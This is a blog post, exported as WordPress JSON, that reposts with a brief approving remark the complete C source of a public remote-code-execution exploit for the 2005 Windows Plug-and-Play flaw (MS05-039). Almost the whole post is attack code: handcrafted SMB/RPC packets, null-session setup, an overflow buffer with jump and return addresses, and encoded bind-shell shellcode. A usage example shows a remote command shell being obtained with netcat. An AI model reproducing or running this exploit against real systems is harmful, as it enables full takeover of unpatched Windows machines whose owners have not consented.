{"id":7564,"date":"2005-08-12T13:05:00","date_gmt":"2005-08-12T17:05:00","guid":{"rendered":"https:\/\/nuxx.net\/blog\/2005\/08\/12\/ms05-039\/"},"modified":"2026-07-01T11:33:29","modified_gmt":"2026-07-01T15:33:29","slug":"ms05-039","status":"publish","type":"post","link":"https:\/\/nuxx.net\/blog\/2005\/08\/12\/ms05-039\/","title":{"rendered":"MS05-039"},"content":{"rendered":"<p><!--more ...and this is why you should keep your Windows machines up to date...--><br \/>\nIt works&#8230;. Quite well&#8230; To say the least.<\/p>\n<p><font face=\"courier\" size=\"small><\/p>\n<pre>\/* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2\r\n*\r\n* Copyright (c) 2005 houseofdabus.\r\n*\r\n* (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\r\n* Universal Exploit + no crash shellcode\r\n*\r\n* .::[ houseofdabus ]::.\r\n*\r\n* ---------------------------------------------------------------------\r\n* Description:\r\n* A remote code execution and local elevation of privilege\r\n* vulnerability exists in Plug and Play that could allow an\r\n* attacker who successfully exploited this vulnerability to take\r\n* complete control of the affected system.\r\n*\r\n* This is a remote code execution and local privilege elevation\r\n* vulnerability. On Windows 2000, an anonymous attacker could\r\n* remotely try to exploit this vulnerability.\r\n*\r\n* On Windows XP Service Pack 1, only an authenticated user could\r\n* remotely try to exploit this vulnerability.\r\n* On Window XP Service Pack 2 and Windows Server 2003, only an\r\n* administrator can remotely access the affected component.\r\n* Therefore, on Windows XP Service Pack 2 and Windows Server 2003,\r\n* this is strictly a local privilege elevation vulnerability.\r\n* An anonymous user cannot remotely attempt to exploit this\r\n* vulnerability on Windows XP Service Pack 2 and Windows\r\n* Server 2003.\r\n*\r\n* ---------------------------------------------------------------------\r\n* Solution:\r\n* http:\/\/www.microsoft.com\/technet\/security\/Bulletin\/MS05-039.mspx\r\n*\r\n* ---------------------------------------------------------------------\r\n* Systems Affected:\r\n* - Windows Server 2003, SP1\r\n* - Windows XP SP1, SP2\r\n* - Windows 2000 SP4\r\n*\r\n* ---------------------------------------------------------------------\r\n* Tested on:\r\n* - Windows 2000 SP4\r\n*\r\n* ---------------------------------------------------------------------\r\n* Compile:\r\n*\r\n* Win32\/VC++ : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c\r\n* Win32\/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c\r\n* Linux : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c\r\n*\r\n* ---------------------------------------------------------------------\r\n* Example:\r\n*\r\n* C:\\>HOD-ms05039-pnp-expl 192.168.0.1 7777\r\n*\r\n* [*] connecting to 192.168.0.22:445...ok\r\n* [*] null session...ok\r\n* [*] bind pipe...ok\r\n* [*] sending crafted packet...ok\r\n* [*] check your shell on 192.168.0.1:7777\r\n* Ctrl+C\r\n*\r\n* C:\\>nc 192.168.0.1 7777\r\n*\r\n* Microsoft Windows 2000 [Version 5.00.2195]\r\n* (C) Copyright 1985-2000 Microsoft Corp.\r\n*\r\n* C:\\WINNT\\system32>\r\n*\r\n* ---------------------------------------------------------------------\r\n*\r\n* This is provided as proof-of-concept code only for educational\r\n* purposes and testing by authorized individuals with permission\r\n* to do so.\r\n*\r\n*\/\r\n\r\n\/* #define _WIN32 *\/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#ifdef _WIN32\r\n#include <winsock2.h>\r\n#pragma comment(lib, \"ws2_32\")\r\n#else\r\n#include <sys\/types.h>\r\n#include <netinet\/in.h>\r\n#include <sys\/socket.h>\r\n#include <netdb.h>\r\n#endif\r\n\r\n\r\nunsigned char SMB_Negotiate[] =\r\n\"\\x00\\x00\\x00\\x85\\xFF\\x53\\x4D\\x42\\x72\\x00\\x00\\x00\\x00\\x18\\x53\\xC8\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x62\\x00\\x02\\x50\\x43\\x20\\x4E\\x45\\x54\\x57\\x4F\"\r\n\"\\x52\\x4B\\x20\\x50\\x52\\x4F\\x47\\x52\\x41\\x4D\\x20\\x31\\x2E\\x30\\x00\\x02\"\r\n\"\\x4C\\x41\\x4E\\x4D\\x41\\x4E\\x31\\x2E\\x30\\x00\\x02\\x57\\x69\\x6E\\x64\\x6F\"\r\n\"\\x77\\x73\\x20\\x66\\x6F\\x72\\x20\\x57\\x6F\\x72\\x6B\\x67\\x72\\x6F\\x75\\x70\"\r\n\"\\x73\\x20\\x33\\x2E\\x31\\x61\\x00\\x02\\x4C\\x4D\\x31\\x2E\\x32\\x58\\x30\\x30\"\r\n\"\\x32\\x00\\x02\\x4C\\x41\\x4E\\x4D\\x41\\x4E\\x32\\x2E\\x31\\x00\\x02\\x4E\\x54\"\r\n\"\\x20\\x4C\\x4D\\x20\\x30\\x2E\\x31\\x32\\x00\";\r\n\r\n\r\nunsigned char SMB_SessionSetupAndX[] =\r\n\"\\x00\\x00\\x00\\xA4\\xFF\\x53\\x4D\\x42\\x73\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\r\n\"\\x00\\x00\\x10\\x00\\x0C\\xFF\\x00\\xA4\\x00\\x04\\x11\\x0A\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x20\\x00\\x00\\x00\\x00\\x00\\xD4\\x00\\x00\\x80\\x69\\x00\\x4E\"\r\n\"\\x54\\x4C\\x4D\\x53\\x53\\x50\\x00\\x01\\x00\\x00\\x00\\x97\\x82\\x08\\xE0\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\\x77\\x00\\x73\\x00\\x20\\x00\"\r\n\"\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x32\\x00\\x31\\x00\\x39\\x00\"\r\n\"\\x35\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\\x77\\x00\"\r\n\"\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x35\\x00\"\r\n\"\\x2E\\x00\\x30\\x00\\x00\\x00\\x00\\x00\";\r\n\r\n\r\nunsigned char SMB_SessionSetupAndX2[] =\r\n\"\\x00\\x00\\x00\\xDA\\xFF\\x53\\x4D\\x42\\x73\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\r\n\"\\x00\\x08\\x20\\x00\\x0C\\xFF\\x00\\xDA\\x00\\x04\\x11\\x0A\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x57\\x00\\x00\\x00\\x00\\x00\\xD4\\x00\\x00\\x80\\x9F\\x00\\x4E\"\r\n\"\\x54\\x4C\\x4D\\x53\\x53\\x50\\x00\\x03\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x46\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x47\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x06\\x00\\x06\\x00\\x40\"\r\n\"\\x00\\x00\\x00\\x10\\x00\\x10\\x00\\x47\\x00\\x00\\x00\\x15\\x8A\\x88\\xE0\\x48\"\r\n\"\\x00\\x4F\\x00\\x44\\x00\\x00\\xED\\x41\\x2C\\x27\\x86\\x26\\xD2\\x59\\xA0\\xB3\"\r\n\"\\x5E\\xAA\\x00\\x88\\x6F\\xC5\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\"\r\n\"\\x77\\x00\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\"\r\n\"\\x32\\x00\\x31\\x00\\x39\\x00\\x35\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6E\\x00\"\r\n\"\\x64\\x00\\x6F\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\"\r\n\"\\x30\\x00\\x20\\x00\\x35\\x00\\x2E\\x00\\x30\\x00\\x00\\x00\\x00\\x00\";\r\n\r\n\r\nunsigned char SMB_TreeConnectAndX[] =\r\n\"\\x00\\x00\\x00\\x5A\\xFF\\x53\\x4D\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\r\n\"\\x00\\x08\\x30\\x00\\x04\\xFF\\x00\\x5A\\x00\\x08\\x00\\x01\\x00\\x2F\\x00\\x00\";\r\n\r\n\r\n\r\nunsigned char SMB_TreeConnectAndX_[] =\r\n\"\\x00\\x00\\x3F\\x3F\\x3F\\x3F\\x3F\\x00\";\r\n\r\n\r\n\/* browser *\/\r\nunsigned char SMB_PipeRequest_browser[] =\r\n\"\\x00\\x00\\x00\\x66\\xFF\\x53\\x4D\\x42\\xA2\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x78\\x04\"\r\n\"\\x00\\x08\\x40\\x00\\x18\\xFF\\x00\\xDE\\xDE\\x00\\x10\\x00\\x16\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x9F\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x00\\x00\"\r\n\"\\x02\\x00\\x00\\x00\\x03\\x13\\x00\\x00\\x5C\\x00\\x62\\x00\\x72\\x00\\x6F\\x00\"\r\n\"\\x77\\x00\\x73\\x00\\x65\\x00\\x72\\x00\\x00\\x00\";\r\n\r\n\r\nunsigned char SMB_PNPEndpoint[] =\r\n\/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp *\/\r\n\"\\x00\\x00\\x00\\x9C\\xFF\\x53\\x4D\\x42\\x25\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x78\\x04\"\r\n\"\\x00\\x08\\x50\\x00\\x10\\x00\\x00\\x48\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x54\\x00\\x48\\x00\\x54\\x00\\x02\"\r\n\"\\x00\\x26\\x00\\x00\\x40\\x59\\x00\\x00\\x5C\\x00\\x50\\x00\\x49\\x00\\x50\\x00\"\r\n\"\\x45\\x00\\x5C\\x00\\x00\\x00\\x40\\x00\\x05\\x00\\x0B\\x03\\x10\\x00\\x00\\x00\"\r\n\"\\x48\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xB8\\x10\\xB8\\x10\\x00\\x00\\x00\\x00\"\r\n\"\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x40\\x4E\\x9F\\x8D\\x3D\\xA0\\xCE\\x11\"\r\n\"\\x8F\\x69\\x08\\x00\\x3E\\x30\\x05\\x1B\\x01\\x00\\x00\\x00\\x04\\x5D\\x88\\x8A\"\r\n\"\\xEB\\x1C\\xC9\\x11\\x9F\\xE8\\x08\\x00\\x2B\\x10\\x48\\x60\\x02\\x00\\x00\\x00\";\r\n\r\n\r\n\r\nunsigned char RPC_call[] =\r\n\"\\x00\\x00\\x08\\x90\\xFF\\x53\\x4D\\x42\\x25\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x78\\x04\"\r\n\"\\x00\\x08\\x60\\x00\\x10\\x00\\x00\\x3C\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x54\\x00\\x3C\\x08\\x54\\x00\\x02\"\r\n\"\\x00\\x26\\x00\\x00\\x40\\x4D\\x08\\x00\\x5C\\x00\\x50\\x00\\x49\\x00\\x50\\x00\"\r\n\"\\x45\\x00\\x5C\\x00\\x00\\x00\\x40\\x00\\x05\\x00\\x00\\x03\\x10\\x00\\x00\\x00\"\r\n\"\\x3C\\x08\\x00\\x00\\x01\\x00\\x00\\x00\\x24\\x08\\x00\\x00\\x00\\x00\\x36\\x00\"\r\n\"\\x11\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x52\\x00\\x4F\\x00\"\r\n\"\\x4F\\x00\\x54\\x00\\x5C\\x00\\x53\\x00\\x59\\x00\\x53\\x00\\x54\\x00\\x45\\x00\"\r\n\"\\x4D\\x00\\x5C\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\xFF\\xFF\\x00\\x00\\xE0\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\xC0\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\"\r\n\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\"\r\n\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\"\r\n\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\"\r\n\r\n\/* jmp over - entry point *\/\r\n\"\\xEB\\x08\\x90\\x90\"\r\n\r\n\/* pop reg; pop reg; retn; - umpnpmgr.dll *\/\r\n\"\\x67\\x15\\x7a\\x76\" \/* 0x767a1567 *\/\r\n\r\n\/* jmp ebx - umpnpmgr.dll\r\n\"\\x6f\\x36\\x7a\\x76\" *\/\r\n\r\n\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xEB\\x08\\x90\\x90\\x48\\x4F\\x44\\x88\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\";\r\n\r\n\r\nunsigned char RPC_call_end[] =\r\n\"\\xE0\\x07\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\r\n\r\n\r\nunsigned char bind_shellcode[] =\r\n\"\\x29\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x19\"\r\n\"\\xf5\\x04\\x37\\x83\\xeb\\xfc\\xe2\\xf4\\xe5\\x9f\\xef\\x7a\\xf1\\x0c\\xfb\\xc8\"\r\n\"\\xe6\\x95\\x8f\\x5b\\x3d\\xd1\\x8f\\x72\\x25\\x7e\\x78\\x32\\x61\\xf4\\xeb\\xbc\"\r\n\"\\x56\\xed\\x8f\\x68\\x39\\xf4\\xef\\x7e\\x92\\xc1\\x8f\\x36\\xf7\\xc4\\xc4\\xae\"\r\n\"\\xb5\\x71\\xc4\\x43\\x1e\\x34\\xce\\x3a\\x18\\x37\\xef\\xc3\\x22\\xa1\\x20\\x1f\"\r\n\"\\x6c\\x10\\x8f\\x68\\x3d\\xf4\\xef\\x51\\x92\\xf9\\x4f\\xbc\\x46\\xe9\\x05\\xdc\"\r\n\"\\x1a\\xd9\\x8f\\xbe\\x75\\xd1\\x18\\x56\\xda\\xc4\\xdf\\x53\\x92\\xb6\\x34\\xbc\"\r\n\"\\x59\\xf9\\x8f\\x47\\x05\\x58\\x8f\\x77\\x11\\xab\\x6c\\xb9\\x57\\xfb\\xe8\\x67\"\r\n\"\\xe6\\x23\\x62\\x64\\x7f\\x9d\\x37\\x05\\x71\\x82\\x77\\x05\\x46\\xa1\\xfb\\xe7\"\r\n\"\\x71\\x3e\\xe9\\xcb\\x22\\xa5\\xfb\\xe1\\x46\\x7c\\xe1\\x51\\x98\\x18\\x0c\\x35\"\r\n\"\\x4c\\x9f\\x06\\xc8\\xc9\\x9d\\xdd\\x3e\\xec\\x58\\x53\\xc8\\xcf\\xa6\\x57\\x64\"\r\n\"\\x4a\\xa6\\x47\\x64\\x5a\\xa6\\xfb\\xe7\\x7f\\x9d\\x1a\\x55\\x7f\\xa6\\x8d\\xd6\"\r\n\"\\x8c\\x9d\\xa0\\x2d\\x69\\x32\\x53\\xc8\\xcf\\x9f\\x14\\x66\\x4c\\x0a\\xd4\\x5f\"\r\n\"\\xbd\\x58\\x2a\\xde\\x4e\\x0a\\xd2\\x64\\x4c\\x0a\\xd4\\x5f\\xfc\\xbc\\x82\\x7e\"\r\n\"\\x4e\\x0a\\xd2\\x67\\x4d\\xa1\\x51\\xc8\\xc9\\x66\\x6c\\xd0\\x60\\x33\\x7d\\x60\"\r\n\"\\xe6\\x23\\x51\\xc8\\xc9\\x93\\x6e\\x53\\x7f\\x9d\\x67\\x5a\\x90\\x10\\x6e\\x67\"\r\n\"\\x40\\xdc\\xc8\\xbe\\xfe\\x9f\\x40\\xbe\\xfb\\xc4\\xc4\\xc4\\xb3\\x0b\\x46\\x1a\"\r\n\"\\xe7\\xb7\\x28\\xa4\\x94\\x8f\\x3c\\x9c\\xb2\\x5e\\x6c\\x45\\xe7\\x46\\x12\\xc8\"\r\n\"\\x6c\\xb1\\xfb\\xe1\\x42\\xa2\\x56\\x66\\x48\\xa4\\x6e\\x36\\x48\\xa4\\x51\\x66\"\r\n\"\\xe6\\x25\\x6c\\x9a\\xc0\\xf0\\xca\\x64\\xe6\\x23\\x6e\\xc8\\xe6\\xc2\\xfb\\xe7\"\r\n\"\\x92\\xa2\\xf8\\xb4\\xdd\\x91\\xfb\\xe1\\x4b\\x0a\\xd4\\x5f\\xf6\\x3b\\xe4\\x57\"\r\n\"\\x4a\\x0a\\xd2\\xc8\\xc9\\xf5\\x04\\x37\";\r\n\r\n#define SET_PORTBIND_PORT(buf, port) \\\r\n*(unsigned short *)(((buf)+186)) = (port)\r\n\r\n\r\nvoid\r\nconvert_name(char *out, char *name)\r\n{\r\nunsigned long len;\r\n\r\nlen = strlen(name);\r\nout += len * 2 - 1;\r\nwhile (len--) {\r\n*out-- = '\\x00';\r\n*out-- = name[len];\r\n}\r\n}\r\n\r\n\r\n\r\nint\r\nmain (int argc, char **argv)\r\n{\r\nstruct sockaddr_in addr;\r\nstruct hostent *he;\r\nint len;\r\nint sockfd;\r\nunsigned short smblen;\r\nunsigned short bindport;\r\nunsigned char tmp[1024];\r\nunsigned char packet[4096];\r\nunsigned char *ptr;\r\nchar recvbuf[4096];\r\n\r\n#ifdef _WIN32\r\nWSADATA wsa;\r\nWSAStartup(MAKEWORD(2,0), &wsa);\r\n#endif\r\n\r\nprintf(\"\\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\\n\");\r\nprintf(\"\\t Universal Exploit + no crash shellcode\\n\\n\\n\");\r\nprintf(\"\\t Copyright (c) 2005 .: houseofdabus :.\\n\\n\\n\");\r\n\r\n\r\nif (argc < 3) {\r\nprintf(\"%s <host> <bind port>\\n\", argv[0]);\r\nexit(0);\r\n}\r\n\r\nif ((he = gethostbyname(argv[1])) == NULL) {\r\nprintf(\"[-] Unable to resolve %s\\n\", argv[1]);\r\nexit(0);\r\n}\r\n\r\nif ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {\r\nprintf(\"[-] socket failed\\n\");\r\nexit(0);\r\n}\r\n\r\naddr.sin_family = AF_INET;\r\naddr.sin_port = htons(445);\r\naddr.sin_addr = *((struct in_addr *)he->h_addr);\r\nmemset(&(addr.sin_zero), '\\0', 8);\r\n\r\n\r\n\r\nprintf(\"\\n[*] connecting to %s:445...\", argv[1]);\r\nif (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {\r\nprintf(\"\\n[-] connect failed\\n\");\r\nexit(0);\r\n}\r\nprintf(\"ok\\n\");\r\n\r\nprintf(\"[*] null session...\");\r\nif (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {\r\nprintf(\"\\n[-] send failed\\n\");\r\nexit(0);\r\n}\r\n\r\nlen = recv(sockfd, recvbuf, 4096, 0);\r\nif ((len <= 10) || (recvbuf[9] != 0)) {\r\nprintf(\"\\n[-] failed\\n\");\r\nexit(0);\r\n}\r\n\r\nif (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {\r\nprintf(\"\\n[-] send failed\\n\");\r\nexit(0);\r\n}\r\n\r\nlen = recv(sockfd, recvbuf, 4096, 0);\r\nif (len <= 10) {\r\nprintf(\"\\n[-] failed\\n\");\r\nexit(0);\r\n}\r\n\r\nif (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {\r\nprintf(\"\\n[-] send failed\\n\");\r\nexit(0);\r\n}\r\n\r\nlen = recv(sockfd, recvbuf, 4096, 0);\r\nif ((len <= 10) || (recvbuf[9] != 0)) {\r\nprintf(\"\\n[-] failed\\n\");\r\nexit(0);\r\n}\r\n\r\nptr = packet;\r\nmemcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);\r\nptr += sizeof(SMB_TreeConnectAndX)-1;\r\n\r\nsprintf(tmp, \"\\\\\\\\%s\\\\IPC$\", argv[1]);\r\nconvert_name(ptr, tmp);\r\nsmblen = strlen(tmp)*2;\r\nptr += smblen;\r\nsmblen += 9;\r\nmemcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &#038;smblen, 1);\r\n\r\nmemcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);\r\nptr += sizeof(SMB_TreeConnectAndX_)-1;\r\n\r\nsmblen = ptr-packet;\r\nsmblen -= 4;\r\nmemcpy(packet+3, &#038;smblen, 1);\r\n\r\nif (send(sockfd, packet, ptr-packet, 0) < 0) {\r\nprintf(\"\\n[-] send failed\\n\");\r\nexit(0);\r\n}\r\n\r\nlen = recv(sockfd, recvbuf, 4096, 0);\r\nif ((len <= 10) || (recvbuf[9] != 0)) {\r\nprintf(\"\\n[-] failed\\n\");\r\nexit(0);\r\n}\r\n\r\nprintf(\"ok\\n\");\r\nprintf(\"[*] bind pipe...\");\r\n\r\nif (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {\r\nprintf(\"\\n[-] send failed\\n\");\r\nexit(0);\r\n}\r\n\r\nlen = recv(sockfd, recvbuf, 4096, 0);\r\nif ((len <= 10) || (recvbuf[9] != 0)) {\r\nprintf(\"\\n[-] failed\\n\");\r\nexit(0);\r\n}\r\n\r\nif (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {\r\nprintf(\"\\n[-] send failed\\n\");\r\nexit(0);\r\n}\r\n\r\nlen = recv(sockfd, recvbuf, 4096, 0);\r\nif ((len <= 10) || (recvbuf[9] != 0)) {\r\nprintf(\"\\n[-] failed\\n\");\r\nexit(0);\r\n}\r\n\r\nprintf(\"ok\\n\");\r\nprintf(\"[*] sending crafted packet...\");\r\n\r\n\/\/ nop\r\nptr = packet;\r\nmemset(packet, '\\x90', sizeof(packet));\r\n\r\n\/\/ header &#038; offsets\r\nmemcpy(ptr, RPC_call, sizeof(RPC_call)-1);\r\nptr += sizeof(RPC_call)-1;\r\n\r\n\/\/ shellcode\r\nbindport = (unsigned short)atoi(argv[2]);\r\nbindport ^= 0x0437;\r\nSET_PORTBIND_PORT(bind_shellcode, htons(bindport));\r\nmemcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);\r\n\r\n\/\/ end of packet\r\nmemcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,\r\nRPC_call_end,\r\nsizeof(RPC_call_end)-1);\r\n\r\n\/\/ sending...\r\nif (send(sockfd, packet, 2196, 0) < 0) {\r\nprintf(\"\\n[-] send failed\\n\");\r\nexit(0);\r\n}\r\nprintf(\"ok\\n\");\r\nprintf(\"[*] check your shell on %s:%i\\n\", argv[1], atoi(argv[2]));\r\n\r\nrecv(sockfd, recvbuf, 4096, 0);\r\n\r\nreturn 0;\r\n}<\/pre>\n<p><\/font><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[13,34],"tags":[],"class_list":["post-7564","post","type-post","status-publish","format-standard","hentry","category-computers","category-moved-from-livejournal"],"_links":{"self":[{"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/posts\/7564","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/comments?post=7564"}],"version-history":[{"count":1,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/posts\/7564\/revisions"}],"predecessor-version":[{"id":14064,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/posts\/7564\/revisions\/14064"}],"wp:attachment":[{"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/media?parent=7564"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/categories?post=7564"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/tags?post=7564"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}